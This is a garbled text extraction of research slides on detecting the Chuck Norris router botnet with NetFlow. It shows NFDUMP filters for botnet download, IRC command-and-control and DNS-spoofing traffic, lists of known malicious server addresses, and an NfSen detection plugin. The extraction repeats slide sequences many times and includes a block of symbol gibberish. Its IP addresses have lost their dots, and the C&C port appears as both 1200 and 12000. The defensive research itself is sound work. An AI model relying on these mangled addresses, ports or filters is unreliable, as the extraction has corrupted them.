NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP)
and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2)
and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP)
and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
NFDUMP detection filter
(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2)
and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP)
and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
NFDUMP detection filter
(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2)
and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP)
and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
NFDUMP detection filter
(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
